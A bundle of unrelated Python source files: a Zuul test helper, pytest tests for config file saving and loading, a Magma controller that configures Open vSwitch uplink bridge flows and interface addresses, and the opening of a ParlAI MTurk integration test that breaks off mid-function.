for queue in self.event_queues:
queue.join()
def waitUntilSettled(self):
self.log.debug("Waiting until settled...")
start = time.time()
while True:
if time.time() - start > 10:
self.log.debug("Queue status:")
for queue in self.event_queues:
self.log.debug(" %s: %s" % (queue, queue.empty()))
self.log.debug("All builds waiting: %s" %
(self.areAllBuildsWaiting(),))
raise Exception("Timeout waiting for Zuul to settle")
# Make sure no new events show up while we're checking
self.worker.lock.acquire()
# have all build states propogated to zuul?
if self.haveAllBuildsReported():
# Join ensures that the queue is empty _and_ events have been
# processed
self.eventQueuesJoin()
self.sched.run_handler_lock.acquire()
if (not self.merge_client.build_sets and
all(self.eventQueuesEmpty()) and
self.haveAllBuildsReported() and
self.areAllBuildsWaiting()):
self.sched.run_handler_lock.release()
self.worker.lock.release()
self.log.debug("...settled.")
return
self.sched.run_handler_lock.release()
self.worker.lock.release()
self.sched.wake_event.wait(0.1)
def countJobResults(self, jobs, result):
jobs = filter(lambda x: x.result == result, jobs)
return len(jobs)
def getJobFromHistory(self, name):
history = self.worker.build_history
for job in history:
if job.name == name:
return job
raise Exception("Unable to find job %s in history" % name)
def assertEmptyQueues(self):
# Make sure there are no orphaned jobs
for pipeline in self.sched.layout.pipelines.values():
for queue in pipeline.queues:
if len(queue.queue) != 0:
print('pipeline %s queue %s contents %s' % (
pipeline.name, queue.name, queue.queue))
self.assertEqual(len(queue.queue), 0,
"Pipelines queues should be empty")
def assertReportedStat(self, key, value=None, kind=None):
start = time.time()
while time.time() < (start + 5):
for stat in self.statsd.stats:
pprint.pprint(self.statsd.stats)
k, v = stat.split(':')
if key == k:
if value is None and kind is None:
return
elif value:
if value == v:
return
elif kind:
if v.endswith('|' + kind):
return
time.sleep(0.1)
pprint.pprint(self.statsd.stats)
raise Exception("Key %s not found in reported stats" % key)
class ZuulDBTestCase(ZuulTestCase):
def setup_config(self, config_file='zuul-connections-same-gerrit.conf'):
super(ZuulDBTestCase, self).setup_config(config_file)
for section_name in self.config.sections():
con_match = re.match(r'^connection ([\'\"]?)(.*)(\1)$',
section_name, re.I)
if not con_match:
continue
if self.config.get(section_name, 'driver') == 'sql':
f = MySQLSchemaFixture()
self.useFixture(f)
if (self.config.get(section_name, 'dburi') ==
'$MYSQL_FIXTURE_DBURI$'):
self.config.set(section_name, 'dburi', f.dburi)
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from kujenga.util.config import create_default_kujenga_config, initial_config_file, load_config, save_config
from kujenga.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aide in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_kujenga_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_kujenga_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_kujenga_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_kujenga_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_kujenga_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 55324
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written-to as a whole.
"""
# Artifically inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
uplink_bridge.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import subprocess
import threading
from collections import namedtuple
import netaddr
import netifaces
from magma.pipelined.app.base import ControllerType, MagmaController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.openflow import flows
class UplinkBridgeController(MagmaController):
"""
This controller manages uplink bridge flows
These flows are used in Non NAT configuration.
"""
APP_NAME = "uplink_bridge"
APP_TYPE = ControllerType.SPECIAL
UPLINK_DHCP_PORT_NAME = 'dhcp0'
UPLINK_PATCH_PORT_NAME = 'patch-agw'
UPLINK_OVS_BRIDGE_NAME = 'uplink_br0'
DEFAULT_UPLINK_PORT_NANE = 'eth3'
DEFAULT_UPLINK_MAC = '11:22:33:44:55:66'
DEFAULT_DEV_VLAN_IN = 'vlan_pop_in'
DEFAULT_DEV_VLAN_OUT = 'vlan_pop_out'
UplinkConfig = namedtuple(
'UplinkBridgeConfig',
['uplink_bridge', 'uplink_eth_port_name', 'uplink_patch',
'enable_nat', 'virtual_mac', 'dhcp_port',
'sgi_management_iface_vlan', 'sgi_management_iface_ip_addr',
'dev_vlan_in', 'dev_vlan_out', 'ovs_vlan_workaround',
'sgi_management_iface_gw'],
)
def __init__(self, *args, **kwargs):
super(UplinkBridgeController, self).__init__(*args, **kwargs)
self.config = self._get_config(kwargs['config'])
self.logger.info("uplink bridge app config: %s", self.config)
def _get_config(self, config_dict) -> namedtuple:
enable_nat = config_dict.get('enable_nat', True)
bridge_name = config_dict.get('uplink_bridge',
self.UPLINK_OVS_BRIDGE_NAME)
dhcp_port = config_dict.get('uplink_dhcp_port',
self.UPLINK_DHCP_PORT_NAME)
uplink_patch = config_dict.get('uplink_patch',
self.UPLINK_PATCH_PORT_NAME)
uplink_eth_port_name = config_dict.get('uplink_eth_port_name',
self.DEFAULT_UPLINK_PORT_NANE)
if uplink_eth_port_name not in netifaces.interfaces():
uplink_eth_port_name = None
virtual_mac = config_dict.get('virtual_mac',
self.DEFAULT_UPLINK_MAC)
sgi_management_iface_vlan = config_dict.get('sgi_management_iface_vlan', "")
sgi_management_iface_ip_addr = config_dict.get('sgi_management_iface_ip_addr', "")
dev_vlan_in = config_dict.get('dev_vlan_in', self.DEFAULT_DEV_VLAN_IN)
dev_vlan_out = config_dict.get('dev_vlan_out', self.DEFAULT_DEV_VLAN_OUT)
ovs_vlan_workaround = config_dict.get('ovs_vlan_workaround', True)
sgi_management_iface_gw = config_dict.get('sgi_management_iface_gw', "")
return self.UplinkConfig(
enable_nat=enable_nat,
uplink_bridge=bridge_name,
uplink_eth_port_name=uplink_eth_port_name,
virtual_mac=virtual_mac,
uplink_patch=uplink_patch,
dhcp_port=dhcp_port,
sgi_management_iface_vlan=sgi_management_iface_vlan,
sgi_management_iface_ip_addr=sgi_management_iface_ip_addr,
dev_vlan_in=dev_vlan_in,
dev_vlan_out=dev_vlan_out,
ovs_vlan_workaround=ovs_vlan_workaround,
sgi_management_iface_gw=sgi_management_iface_gw
)
def initialize_on_connect(self, datapath):
if self.config.enable_nat is True:
self._delete_all_flows()
self._del_eth_port()
return
self._delete_all_flows()
self._add_eth_port()
self._setup_vlan_pop_dev()
# flows to forward traffic between patch port to eth port
# 1. Setup SGi management iface flows
if self.config.sgi_management_iface_vlan:
# 1.a. Ingress
match = "in_port=%s,vlan_vid=%s/0x1fff" % (self.config.uplink_eth_port_name,
hex(0x1000 | int(self.config.sgi_management_iface_vlan)))
actions = "strip_vlan,output:LOCAL"
self._install_flow(flows.MAXIMUM_PRIORITY, match, actions)
# 1.b. Egress
match = "in_port=LOCAL"
actions = "push_vlan:0x8100,mod_vlan_vid=%s,output:%s" % (self.config.sgi_management_iface_vlan,
self.config.uplink_eth_port_name)
self._install_flow(flows.MAXIMUM_PRIORITY, match, actions)
else:
# 1.a. Ingress
match = "in_port=%s,ip" % self.config.uplink_eth_port_name
actions = "output:LOCAL"
self._install_flow(flows.MINIMUM_PRIORITY, match, actions)
# 1.b. Egress
match = "in_port=LOCAL"
actions = "output:%s" % self.config.uplink_eth_port_name
self._install_flow(flows.MINIMUM_PRIORITY, match, actions)
# 2.a. DHCP Req traffic
match = "in_port=%s,ip,udp,tp_dst=68" % self.config.uplink_eth_port_name
actions = "output:%s,output:LOCAL" % self.config.dhcp_port
self._install_flow(flows.MAXIMUM_PRIORITY - 1, match, actions)
# 2.b DHCP reply flows
match = "in_port=%s" % self.config.dhcp_port
actions = "output:%s" % self.config.uplink_eth_port_name
self._install_flow(flows.MAXIMUM_PRIORITY - 1, match, actions)
# 3. UE egress traffic
match = "in_port=%s" % self.config.uplink_patch
actions = "mod_dl_src=%s, output:%s" % (self.config.virtual_mac,
self.config.uplink_eth_port_name)
self._install_flow(flows.MEDIUM_PRIORITY, match, actions)
if self.config.ovs_vlan_workaround:
# 4.a. All ingress IP traffic for UE mac
match = "in_port=%s,dl_dst=%s, vlan_tci=0x0000/0x1000" % \
(self.config.uplink_eth_port_name,
self.config.virtual_mac)
actions = "output:%s" % self.config.uplink_patch
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
match = "in_port=%s,dl_dst=%s, vlan_tci=0x1000/0x1000" % \
(self.config.uplink_eth_port_name,
self.config.virtual_mac)
actions = "strip_vlan,output:%s" % self.config.dev_vlan_in
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
# 4.b. redirect all vlan-out traffic to patch port
match = "in_port=%s,dl_dst=%s" % \
(self.config.dev_vlan_out,
self.config.virtual_mac)
actions = "output:%s" % self.config.uplink_patch
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
else:
# 4.a. All ingress IP traffic for UE mac
match = "in_port=%s, dl_dst=%s" % \
(self.config.uplink_eth_port_name,
self.config.virtual_mac)
actions = "output:%s" % self.config.uplink_patch
self._install_ip_v4_v6_flows(flows.MEDIUM_PRIORITY, match, actions)
# 5. Handle ARP from eth0
match = "in_port=%s,arp" % self.config.uplink_eth_port_name
actions = "output:%s,output:%s,output:LOCAL" % (self.config.dhcp_port,
self.config.uplink_patch)
self._install_flow(flows.MINIMUM_PRIORITY, match, actions)
# everything else:
self._kill_dhclient(self.config.uplink_eth_port_name)
self._set_sgi_ip_addr(self.config.uplink_bridge)
self._set_sgi_gw(self.config.uplink_bridge)
self._set_arp_ignore('all', '1')
def cleanup_on_disconnect(self, datapath):
self._del_eth_port()
self._delete_all_flows()
def delete_all_flows(self, datapath):
self._delete_all_flows()
def _delete_all_flows(self):
if self.config.uplink_bridge is None:
return
del_flows = "ovs-ofctl del-flows %s" % self.config.uplink_bridge
self.logger.info("Delete all flows: %s", del_flows)
try:
subprocess.Popen(del_flows, shell=True).wait()
except subprocess.CalledProcessError as ex:
raise Exception('Error: %s failed with: %s' % (del_flows, ex))
def _install_flow(self, priority: int, flow_match: str, flow_action: str):
if self.config.enable_nat is True:
return
flow_cmd = "ovs-ofctl add-flow -Oopenflow13 %s \"priority=%s,%s, actions=%s\"" % (
self.config.uplink_bridge, priority,
flow_match, flow_action)
self.logger.info("Create flow %s", flow_cmd)
try:
subprocess.Popen(flow_cmd, shell=True).wait()
except subprocess.CalledProcessError as ex:
raise Exception('Error: %s failed with: %s' % (flow_cmd, ex))
def _install_ip_v4_v6_flows(self, priority: int, flow_match: str, flow_action: str):
if self.config.enable_nat is True:
return
self._install_flow(priority, flow_match + ", ip", flow_action)
self._install_flow(priority, flow_match + ", ipv6", flow_action)
def _add_eth_port(self):
if self.config.enable_nat is True or \
self.config.uplink_eth_port_name is None:
return
if BridgeTools.port_is_in_bridge(self.config.uplink_bridge,
self.config.uplink_eth_port_name):
return
self._cleanup_if(self.config.uplink_eth_port_name, True)
# Add eth interface to OVS.
ovs_add_port = "ovs-vsctl --may-exist add-port %s %s" \
% (self.config.uplink_bridge, self.config.uplink_eth_port_name)
try:
subprocess.Popen(ovs_add_port, shell=True).wait()
except subprocess.CalledProcessError as ex:
raise Exception('Error: %s failed with: %s' % (ovs_add_port, ex))
self.logger.info("Add uplink port: %s", ovs_add_port)
def _del_eth_port(self):
if BridgeTools.port_is_in_bridge(self.config.uplink_bridge,
self.config.uplink_eth_port_name):
self._cleanup_if(self.config.uplink_bridge, True)
if self.config.uplink_eth_port_name is None:
return
ovs_rem_port = "ovs-vsctl --if-exists del-port %s %s" \
% (self.config.uplink_bridge, self.config.uplink_eth_port_name)
try:
subprocess.Popen(ovs_rem_port, shell=True).wait()
self.logger.info("Remove ovs uplink port: %s", ovs_rem_port)
except subprocess.CalledProcessError as ex:
self.logger.debug("ignore port del error: %s ", ex)
return
if self.config.uplink_eth_port_name:
self._set_sgi_ip_addr(self.config.uplink_eth_port_name)
self._set_sgi_gw(self.config.uplink_eth_port_name)
def _set_sgi_gw(self, if_name: str):
self.logger.debug('self.config.sgi_management_iface_gw %s',
self.config.sgi_management_iface_gw)
if self.config.sgi_management_iface_gw is None or \
self.config.sgi_management_iface_gw == "":
return
try:
set_gw_command = ["ip",
"route", "replace", "default", "via",
self.config.sgi_management_iface_gw,
"metric", "100", "dev",
if_name]
subprocess.check_call(set_gw_command)
self.logger.debug("SGi GW config: [%s]", set_gw_command)
except subprocess.SubprocessError as e:
self.logger.warning("Error while setting SGi GW: %s", e)
def _set_sgi_ip_addr(self, if_name: str):
self.logger.debug("self.config.sgi_management_iface_ip_addr %s",
self.config.sgi_management_iface_ip_addr)
if self.config.sgi_management_iface_ip_addr is None or \
self.config.sgi_management_iface_ip_addr == "":
if if_name == self.config.uplink_bridge:
self._restart_dhclient(if_name)
else:
if_addrs = netifaces.ifaddresses(if_name).get(netifaces.AF_INET, [])
if len(if_addrs) != 0:
self.logger.info("SGi has valid IP, skip reconfiguration %s", if_addrs)
return
# for system port, use networking config
try:
self._flush_ip(if_name)
except subprocess.CalledProcessError as ex:
self.logger.info("could not flush ip addr: %s, %s",
if_name, ex)
if_up_cmd = ["ifup", if_name, "--force"]
try:
subprocess.check_call(if_up_cmd)
except subprocess.CalledProcessError as ex:
self.logger.info("could not bring up if: %s, %s",
if_up_cmd, ex)
return
try:
self._kill_dhclient(if_name)
if self._is_iface_ip_set(if_name,
self.config.sgi_management_iface_ip_addr):
self.logger.info("ip addr %s already set for iface %s",
self.config.sgi_management_iface_ip_addr,
if_name)
return
self._flush_ip(if_name)
set_ip_cmd = ["ip",
"addr", "add",
self.config.sgi_management_iface_ip_addr,
"dev",
if_name]
subprocess.check_call(set_ip_cmd)
self.logger.debug("SGi ip address config: [%s]", set_ip_cmd)
except subprocess.SubprocessError as e:
self.logger.warning("Error while setting SGi IP: %s", e)
def _is_iface_ip_set(self, if_name, ip_addr):
ip_addr = netaddr.IPNetwork(ip_addr)
if_addrs = netifaces.ifaddresses(if_name).get(netifaces.AF_INET, [])
for addr in if_addrs:
addr = netaddr.IPNetwork("/".join((addr['addr'], addr['netmask'])))
if ip_addr == addr:
return True
return False
def _flush_ip(self, if_name):
flush_ip = ["ip", "addr", "flush", "dev", if_name]
subprocess.check_call(flush_ip)
def _kill_dhclient(self, if_name):
# Kill dhclient if running.
pgrep_out = subprocess.Popen(["pgrep", "-f", "dhclient.*" + if_name],
stdout=subprocess.PIPE)
for pid in pgrep_out.stdout.readlines():
subprocess.check_call(["kill", pid.strip()])
def _restart_dhclient(self, if_name):
# restart DHCP client can take loooong time, process it in separate thread:
threading.Thread(target=self._restart_dhclient_if(if_name))
def _setup_vlan_pop_dev(self):
if self.config.ovs_vlan_workaround:
# Create device
BridgeTools.create_veth_pair(self.config.dev_vlan_in,
self.config.dev_vlan_out)
# Add to OVS,
# OFP requested port (70 and 71) no are for test validation,
# its not used anywhere else.
BridgeTools.add_ovs_port(self.config.uplink_bridge,
self.config.dev_vlan_in, "70")
BridgeTools.add_ovs_port(self.config.uplink_bridge,
self.config.dev_vlan_out, "71")
def _cleanup_if(self, if_name, flush: bool):
# Release eth IP first.
release_eth_ip = ["dhclient", "-r", if_name]
try:
subprocess.check_call(release_eth_ip)
except subprocess.CalledProcessError as ex:
self.logger.info("could not release dhcp lease: %s, %s",
release_eth_ip, ex)
if not flush:
return
try:
self._flush_ip(if_name)
except subprocess.CalledProcessError as ex:
self.logger.info("could not flush ip addr: %s, %s", if_name, ex)
self.logger.info("SGi DHCP: port [%s] ip removed", if_name)
def _restart_dhclient_if(self, if_name):
self._cleanup_if(if_name, False)
setup_dhclient = ["dhclient", if_name]
try:
subprocess.check_call(setup_dhclient)
except subprocess.CalledProcessError as ex:
self.logger.info("could not release dhcp lease: %s, %s",
setup_dhclient, ex)
self.logger.info("SGi DHCP: restart for %s done", if_name)
def _set_arp_ignore(self, if_name: str, val: str):
sysctl_setting = 'net.ipv4.conf.' + if_name + '.arp_ignore=' + val
subprocess.check_call(['sysctl', sysctl_setting])
|
integration_test.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
"""
Script for testing complete functionality of the MTurk conversation backend.
Simulates agents and interactions and tests the outcomes of interacting with
the server to ensure that the messages that are recieved are as intended.
It pretends to act in the way that core.html is supposed to follow, both
related to what is sent and recieved, what fields are checked, etc. A change
to the core.html file will not be caught by this script.
Doesn't actually interact with Amazon MTurk as they don't offer a robust
testing framework as of September 2017, so interactions with MTurk and updating
HIT status and things of the sort are not yet supported in this testing.
"""
from parlai.core.params import ParlaiParser
from parlai.mturk.core.test.integration_test.worlds import TestOnboardWorld, \
TestSoloWorld, TestDuoWorld
from parlai.mturk.core.mturk_manager import MTurkManager, WORLD_START_TIMEOUT
from parlai.mturk.core.server_utils import setup_server, delete_server
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_state import AssignState
from parlai.mturk.core.agents import MTURK_DISCONNECT_MESSAGE
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.mturk_utils as mturk_utils
from parlai.mturk.core.mturk_utils import create_hit_config
from socketIO_client_nexus import SocketIO
import time
import os
import uuid
import threading
TEST_TASK_DESCRIPTION = 'This is a test task description'
MTURK_AGENT_IDS = ['TEST_USER_1', 'TEST_USER_2']
PORT = 443
FAKE_HIT_ID = 'FAKE_HIT_ID_{}'
TASK_GROUP_ID = 'TEST_TASK_GROUP_{}'
AGENT_1_ID = 'TEST_AGENT_1'
AGENT_2_ID = 'TEST_AGENT_2'
ASSIGN_1_ID = 'FAKE_ASSIGNMENT_ID_1'
HIT_1_ID = 'FAKE_HIT_ID_1'
SOCKET_TEST = 'SOCKET_TEST'
SOLO_ONBOARDING_TEST = 'SOLO_ONBOARDING_TEST'
SOLO_NO_ONBOARDING_TEST = 'SOLO_NO_ONBOARDING_TEST'
SOLO_REFRESH_TEST = 'SOLO_REFRESH_TEST'
DUO_ONBOARDING_TEST = 'DUO_ONBOARDING_TEST'
DUO_NO_ONBOARDING_TEST = 'DUO_NO_ONBOARDING_TEST'
DUO_VALID_RECONNECT_TEST = 'DUO_VALID_RECONNECT_TEST'
DUO_ONE_DISCONNECT_TEST = 'DUO_ONE_DISCONNECT_TEST'
COUNT_COMPLETE_TEST = 'COUNT_COMPLETE_TEST'
EXPIRE_HIT_TEST = 'EXPIRE_HIT_TEST'
ALLOWED_CONVERSATION_TEST = 'ALLOWED_CONVERSATION_TEST'
UNIQUE_CONVERSATION_TEST = 'UNIQUE_CONVERSATION_TEST'
AMAZON_SNS_TEST = 'AMAZON_SNS_TEST'
FAKE_ASSIGNMENT_ID = 'FAKE_ASSIGNMENT_ID_{}_{}'
FAKE_WORKER_ID = 'FAKE_WORKER_ID_{}_{}'
DISCONNECT_WAIT_TIME = SocketManager.DEF_SOCKET_TIMEOUT + 1.5
completed_threads = {}
start_times = {}
def dummy(*args):
pass
class MockAgent(object):
"""Class that pretends to be an MTurk agent interacting through the
webpage by simulating the same commands that are sent from the core.html
file. Exposes methods to use for testing and checking status
"""
def __init__(self, opt, hit_id, assignment_id, worker_id, task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.socketIO = None
self.always_beat = False
self.ready = False
self.wants_to_send = False
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
self.socketIO.emit(event_name, packet.as_dict())
def build_and_send_packet(self, packet_type, data, callback):
if not callback:
def callback(*args):
pass
msg = {
'id': str(uuid.uuid4()),
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data
}
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
if (packet_type == Packet.TYPE_ALIVE):
event_name = data_model.SOCKET_AGENT_ALIVE_STRING
self.socketIO.emit(event_name, msg, callback)
def send_message(self, text, callback=dummy):
if not callback:
def callback(*args):
pass
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False
}
self.wants_to_send = False
self.build_and_send_packet(Packet.TYPE_MESSAGE, data, callback)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id
}
self.build_and_send_packet(Packet.TYPE_ALIVE, data, None)
def setup_socket(self, server_url, message_handler):
"""Sets up a socket for an agent"""
def on_socket_open(*args):
self.send_alive()
def on_new_message(*args):
message_handler(args[0])
def on_disconnect(*args):
self.disconnected = True
self.socketIO = SocketIO(server_url, PORT)
# Register Handlers
self.socketIO.on(data_model.SOCKET_OPEN_STRING, on_socket_open)
self.socketIO.on(data_model.SOCKET_DISCONNECT_STRING, on_disconnect)
self.socketIO.on(data_model.SOCKET_NEW_PACKET_STRING, on_new_message)
# Start listening thread
self.listen_thread = threading.Thread(target=self.socketIO.wait)
self.listen_thread.daemon = True
self.listen_thread.start()
def send_heartbeat(self):
"""Sends a heartbeat to the world"""
hb = {
'id': str(uuid.uuid4()),
'receiver_id': '[World_' + self.task_group_id + ']',
'assignment_id': self.assignment_id,
'sender_id': self.worker_id,
'conversation_id': self.conversation_id,
'type': Packet.TYPE_HEARTBEAT,
'data': None
}
self.socketIO.emit(data_model.SOCKET_ROUTE_PACKET_STRING, hb)
def wait_for_alive(self):
last_time = time.time()
while not self.ready:
self.send_alive()
time.sleep(0.5)
assert time.time() - last_time < 10, \
'Timed out wating for server to acknowledge {} alive'.format(
self.worker_id
)
def handle_setup(opt):
"""Prepare the heroku server without creating real hits"""
create_hit_config(
task_description=TEST_TASK_DESCRIPTION,
unique_worker=False,
is_sandbox=True
)
# Poplulate files to copy over to the server
task_files_to_copy = []
task_directory_path = os.path.join(
opt['parlai_home'],
'parlai',
'mturk',
'core',
'test',
'integration_test'
)
task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
for mturk_agent_id in MTURK_AGENT_IDS + ['onboarding']:
task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
# Setup the server with a likely-unique app-name
task_name = '{}-{}'.format(str(uuid.uuid4())[:8], 'integration_test')
server_task_name = \
''.join(e for e in task_name if e.isalnum() or e == '-')
server_url = \
setup_server(server_task_name, task_files_to_copy)
return server_task_name, server_url
def handle_shutdown(server_task_name):
delete_server(server_task_name)
def wait_for_state_time(seconds, mturk_manager):
seconds_done = 0
while (seconds_done < seconds):
if mturk_manager.socket_manager.alive:
seconds_done += 0.1
time.sleep(0.1)
def run_solo_world(opt, mturk_manager, is_onboarded):
MTURK_SOLO_WORKER = 'MTURK_SOLO_WORKER'
# Runs the solo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
workers[0].id = MTURK_SOLO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
task = opt['task']
mturk_agent = workers[0]
world = TestSoloWorld(opt=opt, task=task, mturk_agent=mturk_agent)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except Exception:
raise
finally:
pass
def run_duo_world(opt, mturk_manager, is_onboarded):
MTURK_DUO_WORKER = 'MTURK_DUO_WORKER'
# Runs the solo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
